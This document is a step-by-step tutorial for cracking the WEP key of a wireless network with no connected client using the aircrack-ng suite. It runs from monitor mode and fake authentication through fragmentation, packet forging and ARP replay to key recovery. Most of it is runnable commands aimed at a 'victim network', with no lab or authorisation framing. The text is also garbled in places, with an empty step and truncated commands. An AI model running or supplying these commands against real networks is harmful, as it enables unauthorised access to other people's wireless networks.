1. Start
card in monitor mode with airmon-ng
2. Search
for available networks using airodump-ng
3. Find
victim network and gather info.
4. Disable
monitor mode and re-enable in victim channel
5. Start
6. Fake
auth with the AP
7. Obtain
PGRA key stream using chop chop or fragmentation
8. Create
packet for injection using packetforge-ng
9. Inject
the packet you created into the network using ARP replay
10. With
enough IVs, crack the WEP key using aircrack-ng
First we run airmon-ng to see our current wireless
airmon-ng start wlan0
With monitor mode enabled on mon0, we can use that interface
to look for our target network.
airodump-ng mon0
Take note of the following:
Target network ESSID
Channel #
Using WEP encryption
Your wireless card’s MAC address (obtained from
Now that we have gathered our information we can kill our
current VAP and start it on the correct channel.
airmon-ng stop mon0
airmon-ng start wlan0
Let’s start airodump again but filter it out for our target
network and specify the output file.
airodump-ng –c 1
–bssid 58:6D:8F:74:40:9B –w noclient mon0
Let this session of airodump run in the background so we can
capture the IVs generated.
increase the success of our later injection attacks we must first run a fake
auth attack.
aireplay-ng -1 60 –e
Buddy –a 58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 mon0
Now we can
begin our chopchop or fragmentation attack to obtain the PGRA key stream. In
this example I will be using the fragmentation attack. In the new terminal
aireplay-ng -5 –b 58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 mon0
Once a packet is found hit “y” to continue the attack.
You now have a saved key stream that can be used with
Using packetforge-ng and our saved key stream, we will
create a packet for injection.
packetforge-ng -0 –a
58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 –k –l –y
fragment-0114-044641.xor –w arp_packet
We can now use the interactive packet replay attack to
inject the ARP packet we just created.
aireplay-ng -2 –r
arp_packet mon0
Once you have a fair amount of IVs, you can attempt to crack
the key. Open a new terminal and type:
aircrack-ng -0
Success! You can now use the decrypted WEP key to get on the
wireless network. If unsuccessful, continue to attempt cracking every 5,000 IVs